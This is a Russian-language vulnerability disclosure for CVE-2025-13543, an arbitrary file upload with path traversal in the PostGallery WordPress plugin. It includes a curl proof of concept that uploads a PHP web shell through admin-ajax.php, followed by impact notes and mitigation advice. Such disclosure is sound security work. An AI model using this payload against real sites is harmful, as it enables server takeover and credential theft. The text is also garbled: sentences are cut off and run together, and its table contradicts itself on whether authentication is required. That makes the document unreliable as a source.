
Раскрытие CVE-2025-13543
Раскрытие информации о CVE-2025-13543
Этот репозиторий раскрывает информацию об уязвимости, обнаруженной в PostGallery <= 1.12.5, плагине WordPress, разработанном rtowebsites.
| CVE ID | Type | Component | Impact |
|---|---|---|---|
| CVE-2025-13543 | Произвольная загрузка файлов аутентифицированным (Subscriber+) пользователем | lib/ajax-actions/imageUpload.php admin/PostGalleryUploader.php | Неаутентифицированный злоумышленник может загрузить произвольный файл |
postgalleryAjaxUpload) и серверная часть PostGalleryUploadercurl -k -X POST "http://localhost:8080/wp-admin/admin-ajax.php" \
-H "Cookie: wordpress_logged_in_<hash>=<your_cookie>" \
-F "action=postgalleryAjaxUpload" \
-F "postid=1" \
-F "uploadFolder=../../../" \
-F "name=shell.php" \
-F "[email protected];type=application/x-php"
wp-config.php и учётных данных базы данных, развёртывание постоянных бэкдоров и создание учётных записей администратора-злоумышленника.lib/ajax-actions/imageUpload.php применяйте надлежащую авторизацию (например, требуйте current_user_can('upload_files')) и проверяйте криптографический nonce перед обработкой загрузок.admin/PostGalleryUploader.php строго ограничьте uploadFolder известным подкаталогом wp-content/uploads/gallery, отклоняйте любые значения, содержащие ../ или абсолютные пути, и нормализуйте пути перед использованием.wp_handle_upload() / wp_check_filetype_and_ext(), и ограничьте загрузки белым списком неисполняемых типов мультимедиа, явно блокируя .php и другие исполняемые расширения в каталогах, доступных через веб.Подумал: «Как может существовать такая CTF-подобная уязвимость...» Одна только произвольная загрузка файлов уже опасна, а тут ещё и обход каталога — настоящее отчаяние. Воспроизводить эту уязвимость было очень интересно.
Имя: MooseLove
Роль: независимый исследователь безопасности / баг-хантер
Контакт: по запросу
Данное уведомление об уязвимости публикуется в целях повышения осведомлённости о безопасности. Разрешено свободное распространение с указанием авторства.